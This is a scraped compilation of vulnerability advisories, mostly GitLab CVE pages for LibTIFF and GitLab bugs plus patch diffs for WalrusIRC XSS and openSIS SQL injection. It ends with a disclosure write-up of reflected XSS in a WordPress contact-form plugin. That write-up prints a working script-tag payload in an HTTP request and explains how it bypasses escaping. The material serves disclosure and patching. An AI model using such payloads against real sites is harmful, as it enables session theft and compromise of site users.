LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3502, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

Switch branch/tag

*   cves
*   2023
*   **CVE-2023-0800.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 4 new advisories · cc12dc4b
    
    🤖 GitLab Bot 🤖 authored Feb 13, 2023
    
    cc12dc4b

CVE-2023-0800: 2023/CVE-2023-0800.json · master · GitLab.org / cves · GitLab

LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3724, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

Switch branch/tag

*   cves
*   2023
*   **CVE-2023-0802.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 3 new advisories · c7ecdac0
    
    🤖 GitLab Bot 🤖 authored Feb 13, 2023
    
    c7ecdac0

CVE-2023-0802: 2023/CVE-2023-0802.json · master · GitLab.org / cves · GitLab

LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3400, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

Switch branch/tag

*   cves
*   2023
*   **CVE-2023-0798.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 4 new advisories · cc12dc4b
    
    🤖 GitLab Bot 🤖 authored Feb 13, 2023
    
    cc12dc4b

CVE-2023-0798: 2023/CVE-2023-0798.json · master · GitLab.org / cves · GitLab

LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3701, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

Switch branch/tag

*   cves
*   2023
*   **CVE-2023-0799.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 4 new advisories · cc12dc4b
    
    🤖 GitLab Bot 🤖 authored Feb 13, 2023
    
    cc12dc4b

CVE-2023-0799: 2023/CVE-2023-0799.json · master · GitLab.org / cves · GitLab

LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3592, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

Switch branch/tag

*   cves
*   2023
*   **CVE-2023-0796.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 2 new advisories · 627e03f9
    
    🤖 GitLab Bot 🤖 authored Feb 13, 2023
    
    627e03f9

CVE-2023-0796: 2023/CVE-2023-0796.json · master · GitLab.org / cves · GitLab

An issue has been discovered in GitLab CE/EE affecting all versions starting from 14.0 before 15.6.7, all versions starting from 15.7 before 15.7.6, all versions starting from 15.8 before 15.8.1. It was possible to trigger a DoS attack by uploading a malicious Helm chart.

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

Switch branch/tag

*   cves
*   2023
*   **CVE-2023-0518.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 3 new advisories · 3ce5f713
    
    🤖 GitLab Bot 🤖 authored Feb 13, 2023
    
    3ce5f713

CVE-2023-0518: 2023/CVE-2023-0518.json · master · GitLab.org / cves · GitLab

A Cross Site Request Forgery issue has been discovered in GitLab CE/EE affecting all versions before 15.6.7, all versions starting from 15.7 before 15.7.6, and all versions starting from 15.8 before 15.8.1. An attacker could take over a project if an Owner or Maintainer uploads a file to a malicious project.

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

Switch branch/tag

*   cves
*   2022
*   **CVE-2022-4138.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 1 new advisories · 1bc6107f
    
    🤖 GitLab Bot 🤖 authored Feb 13, 2023
    
    1bc6107f

CVE-2022-4138: 2022/CVE-2022-4138.json · master · GitLab.org / cves · GitLab

A vulnerability was found in juju2143 WalrusIRC 0.0.2. It has been rated as problematic. This issue affects the function parseLinks of the file public/parser.js. The manipulation of the argument text leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 0.0.3 is able to address this issue. The name of the patch is 45fd885895ae13e8d9b3a71e89d59768914f60af. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220751.

@@ -14,10 +14,10 @@ function parseLinks(text,nav) } text \= text.replace(/http:\\/\\/img.codewalr\\.us\\//g,"\\x01img.codewalr.us/"); text \= text.replace(/http:\\/\\/codewalr\\.us\\//g,"\\x01codewalr.us/"); text \= text.replace(RegExp("(^|.)(((f|ht)(tp|tps):\\/\\/)\[^\\\\s\\x02\\x03\\x0f\\x16\\x1d\\x1f\]\*)","g"),'$1<a target="\_blank" href="$2"'+(nav?' class="navbar-link"':'')+'>$2</a>'); text \= text.replace(RegExp("(^|\\\\s)(www\\\\.\[^\\\\s\\x02\\x03\\x0f\\x16\\x1d\\x1f\]\*)","g"),'$1<a target="\_blank" href="http://$2"'+(nav?' class="navbar-link"':'')+'>$2</a>'); text \= text.replace(RegExp("(^|.)\\x01(img.codewalr.us\\/\[^\\\\s\\x02\\x03\\x0f\\x16\\x1d\\x1f\]\*)","g"),'$1<a target="\_top" href="http://$2"'+(nav?' class="navbar-link"':'')+'><img src="http://$2" class="picture" /></a>'); text \= text.replace(RegExp("(^|.)\\x01(\[^\\\\s\\x02\\x03\\x0f\\x16\\x1d\\x1f\]\*)","g"),'$1<a target="\_top" href="http://$2"'+(nav?' class="navbar-link"':'')+'>http://$2</a>'); text \= text.replace(RegExp("(^|.)(((f|ht)(tp|tps):\\/\\/)\[^\\\\s\\x02\\x03\\x0f\\x16\\x1d\\x1f\\"\]\*)","g"),'$1<a target="\_blank" href="$2"'+(nav?' class="navbar-link"':'')+'>$2</a>'); text \= text.replace(RegExp("(^|\\\\s)(www\\\\.\[^\\\\s\\x02\\x03\\x0f\\x16\\x1d\\x1f\\"\]\*)","g"),'$1<a target="\_blank" href="http://$2"'+(nav?' class="navbar-link"':'')+'>$2</a>'); text \= text.replace(RegExp("(^|.)\\x01(img.codewalr.us\\/\[^\\\\s\\x02\\x03\\x0f\\x16\\x1d\\x1f\\"\]\*)","g"),'$1<a target="\_top" href="http://$2"'+(nav?' class="navbar-link"':'')+'><img src="http://$2" class="picture" /></a>'); text \= text.replace(RegExp("(^|.)\\x01(\[^\\\\s\\x02\\x03\\x0f\\x16\\x1d\\x1f\\"\]\*)","g"),'$1<a target="\_top" href="http://$2"'+(nav?' class="navbar-link"':'')+'>http://$2</a>'); return text; }

CVE-2015-10079: Fix JS injection exploit · juju2143/walrusirc@45fd885

Open Solutions for Education, Inc openSIS Community Edition v8.0 and earlier is vulnerable to SQL Injection via CalendarModal.php.

@@ -28,7 +28,7 @@ #\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*  
session\_start(); !empty($\_SESSION\['USERNAME'\]) or die('Access denied!'); //!empty($\_SESSION\['PROFILE\_ID'\]) or die('Access denied!');  
include "functions/ParamLibFnc.php"; echo '<script type="text/javascript" src="assets/js/pages/components\_popups.js"></script>'; @@ -99,14 +99,13 @@ if ($url === FALSE) { header('Location: index.php'); } error\_reporting(E\_ERROR); $isajax = "ajax"; $start\_time = time(); include 'Warehouse.php'; array\_rwalk($\_REQUEST, 'strip\_tags'); $title\_set = '';  
if (UserStudentID() && User('PROFILE') != 'parent' && User('PROFILE') != 'student' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'Atten' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'users' && clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) != 'students/AddUsers.php' && $\_REQUEST\['modname'\]!= 'tools/Backup.php' && (substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 10) != 'attendance' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/StudentSummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/DailySummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/AddAbsences.php')) { if (UserStudentID() && User('PROFILE') != 'parent' && User('PROFILE') != 'student' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'Atten' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'users' && clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) != 'students/AddUsers.php' && $\_REQUEST\['modname'\] != 'tools/Backup.php' && (substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 10) != 'attendance' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/StudentSummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/DailySummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/AddAbsences.php')) { $RET = DBGet(DBQuery("SELECT FIRST\_NAME,LAST\_NAME,MIDDLE\_NAME,NAME\_SUFFIX FROM students WHERE STUDENT\_ID='" . UserStudentID() . "'")); $count\_student\_RET = DBGet(DBQuery("SELECT COUNT(\*) AS NUM FROM students"));  
@@ -125,8 +124,8 @@ 'students/EnrollmentReport.php', // For Scheduling // 'scheduling/Schedule.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', // 'scheduling/MassSchedule.php', // 'scheduling/MassRequests.php', 'scheduling/PrintSchedules.php', @@ -141,7 +140,7 @@ 'grades/AdminProgressReports.php', 'grades/ProgressReports.php', // 'grades/HonorRoll.php', 'grades/EditReportCardGrades.php', 'grades/EditReportCardGrades.php', // 'grades/GraduationProgress.php', // For Attendance 'attendance/AddAbsences.php', @@ -156,37 +155,32 @@  
$allow\_back\_to\_student\_list = array( // For Students 'students/Student.php', 'students/Student.php', // For Scheduling // 'scheduling/Schedule.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', // For Grades 'grades/EditReportCardGrades.php', 'grades/EditReportCardGrades.php', // For Eligibility 'eligibility/Student.php' );  
if ($count\_student\_RET\[1\]\['NUM'\] > 1) { $title\_set = 'y';  
if(in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { if(in\_array($\_REQUEST\['modname'\], $allow\_back\_to\_student\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">'.\_selectedStudent.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=Students/Student.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> '.\_backToStudentList.'</A></span><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div></div></div></div>'); } else { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">'.\_selectedStudent.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div></div></div></div>'); if (in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { if (in\_array($\_REQUEST\['modname'\], $allow\_back\_to\_student\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">' . \_selectedStudent . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=Students/Student.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> ' . \_backToStudentList . '</A></span><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div></div></div></div>'); } else { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">' . \_selectedStudent . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div></div></div></div>'); } } } else if ($count\_student\_RET\[1\]\['NUM'\] == 1) { $title\_set = 'y';  
if(in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">'.\_selectedStudent.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div></div></div>'); if (in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">' . \_selectedStudent . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div></div></div>'); } } } @@ -199,7 +193,7 @@ if ($\_REQUEST\['modname'\] != 'users/User.php') { $RET = DBGet(DBQuery("SELECT FIRST\_NAME,LAST\_NAME FROM staff WHERE STAFF\_ID='" . UserStaffID() . "'")); echo '<div class="panel panel-default">'; DrawHeader(''.\_selectedStaff.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . $RET\[1\]\['LAST\_NAME'\], '<span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=users/User.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> '.\_backToUserList.'</A></span><div class="btn-group heading-btn"><A HREF=Side.php?staff\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div>'); DrawHeader('' . \_selectedStaff . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . $RET\[1\]\['LAST\_NAME'\], '<span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=users/User.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> ' . \_backToUserList . '</A></span><div class="btn-group heading-btn"><A HREF=Side.php?staff\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div>'); echo '</div>'; } } @@ -208,10 +202,10 @@ if (!isset($\_REQUEST\['\_openSIS\_PDF'\])) { Warehouse('header');  
// if (strpos(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 'miscellaneous/') === false) // echo '<script language="JavaScript">if(window == top && (!window.opener || window.opener.location.href.substring(0,(window.opener.location.href.indexOf("&")!=-1?window.opener.location.href.indexOf("&"):window.opener.location.href.replace("#","").length))!=window.location.href.substring(0,(window.location.href.indexOf("&")!=-1?window.location.href.indexOf("&"):window.location.href.replace("#","").length)))) window.location.href = "index.php";</script>'; echo "<BODY marginwidth=0 leftmargin=0 border=0 onload='doOnload();' background=assets/bg.gif>"; echo '<DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100"></DIV>'; if (strpos(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 'miscellaneous/') === false) echo '<script language="JavaScript">if(window == top && (!window.opener || window.opener.location.href.substring(0,(window.opener.location.href.indexOf("&")!=-1?window.opener.location.href.indexOf("&"):window.opener.location.href.replace("#","").length))!=window.location.href.substring(0,(window.location.href.indexOf("&")!=-1?window.location.href.indexOf("&"):window.location.href.replace("#","").length)))) window.location.href = "index.php";</script>'; // echo "<BODY marginwidth=0 leftmargin=0 border=0 onload='doOnload();' background=assets/bg.gif>"; // echo '<DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100"></DIV>'; }  
$ajax\_to\_sign\_in = ""; @@ -261,8 +255,7 @@  
if (preg\_match('/\\.\\./', $modname) !== 1) include 'modules/' . $modname; } else { } else { if (User('USERNAME')) {  
  
@@ -273,7 +266,7 @@ }  
  
echo "".\_youReNotAllowedToUseThisProgram."! ".\_thisAttemptedViolationHasBeenLoggedAndYourIpAddressWasCaptured."."; echo "" . \_youReNotAllowedToUseThisProgram . "! " . \_thisAttemptedViolationHasBeenLoggedAndYourIpAddressWasCaptured . "."; DBQuery("INSERT INTO hacking\_log (HOST\_NAME,IP\_ADDRESS,LOGIN\_DATE,VERSION,PHP\_SELF,DOCUMENT\_ROOT,SCRIPT\_NAME,MODNAME,USERNAME) values('$\_SERVER\[SERVER\_NAME\]','$ip','" . date('Y-m-d') . "','$openSISVersion','$\_SERVER\[PHP\_SELF\]','$\_SERVER\[DOCUMENT\_ROOT\]','$\_SERVER\[SCRIPT\_NAME\]','$\_REQUEST\[modname\]','" . User('USERNAME') . "')"); Warehouse('footer'); if ($openSISNotifyAddress) @@ -302,7 +295,8 @@ echo '</HTML>'; }  
function decode\_unicode\_url($str) { function decode\_unicode\_url($str) { $res = '';  
$i = 0; @@ -317,11 +311,11 @@ function decode\_unicode\_url($str) { $character = chr($value); else if ($value < 0x0800) // 2 bytes: 110xxxxx 10xxxxxx $character = chr((($value & 0x07c0) >> 6) | 0xc0) . chr(($value & 0x3f) | 0x80); . chr(($value & 0x3f) | 0x80); else // 3 bytes: 1110xxxx 10xxxxxx 10xxxxxx $character = chr((($value & 0xf000) >> 12) | 0xe0) . chr((($value & 0x0fc0) >> 6) | 0x80) . chr(($value & 0x3f) | 0x80); . chr((($value & 0x0fc0) >> 6) | 0x80) . chr(($value & 0x3f) | 0x80); } else $i++;  
@@ -331,21 +325,23 @@ function decode\_unicode\_url($str) { return $res . substr($str, $i); }  
function code2utf($num) { function code2utf($num) { if ($num < 128) return chr($num); if ($num < 1024) return chr(($num >> 6) + 192) . chr(($num & 63) + 128); if ($num < 32768) return chr(($num >> 12) + 224) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128); . chr(($num & 63) + 128); if ($num < 2097152) return chr(($num >> 18) + 240) . chr((($num >> 12) & 63) + 128) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128); . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128); return ''; }  
function unescape($strIn, $iconv\_to = 'UTF-8') { function unescape($strIn, $iconv\_to = 'UTF-8') { $strOut = ''; $iPos = 0; $len = strlen($strIn); @@ -382,5 +378,3 @@ function unescape($strIn, $iconv\_to = 'UTF-8') { } return $strOut; }  
?>

CVE-2022-45962: Version 9.0 release · OS4ED/openSIS-Classic@81799fd

Vsourz Digital Advanced Contact form 7 DB Versions 1.7.2 and 1.9.1 is vulnerable to Cross Site Scripting (XSS).

Permalink

Cannot retrieve contributors at this time

Reflected XSS (Cross-Site Scripting) attack - CVE-2022-45285

\------------------------------------------------------------

Vendor: Vsourz Digital

Wordpress Plugin Versions: Advanced Contact form 7 DB - 1.7.2, 1.9.1

Type: Remote attack

We have identified that the “Advanced Contact form 7 DB - 1.7.2, 1.9.1” Wordpress Plugin Versions are vulnerable to Reflective Cross-site scripting (XSS). This is due to that the Web App fails to sanitize HTML/JavaScript code on the server-side. By leveraging this issue, an attacker is able to cause arbitrary HTML and JavaScript code to be executed in a user's browser (e.g. admin) within the security context of the affected site. This attack can be used in conjunction with a social engineering techniques.

We have managed to bypass the client-side protection (URL Encoding) by intercepting the GET HTTP request using an HTTP proxy tool, and then inserting the XSS payload. Also, we have bypassed the server-side protection (Backslash Escaping) using backticks instead of single or double quotes.

Below, evidence is provided.

Request:

GET /formsurvey/index.php/user/admin/?'><script>alert(\`XSS\`)</script><' HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK

Date: Fri, 04 Nov 2022 12:56:09 GMT

Server: Apache

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Link: <http://1.1.1.1/formsurvey/index.php/wp-json/>; rel="https://api.w.org/"

Link: <http://1.1.1.1/formsurvey/?p=33>; rel=shortlink

Vary: Accept-Encoding

Content-Length: 31433

Connection: close

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>

....

....

<link rel='canonical' href='http://1.1.1.1/formsurvey/index.php/user/admin/?\\'><script>alert(\`XSS\`)</script><\\'' />

....

....

</html>

Tag

#js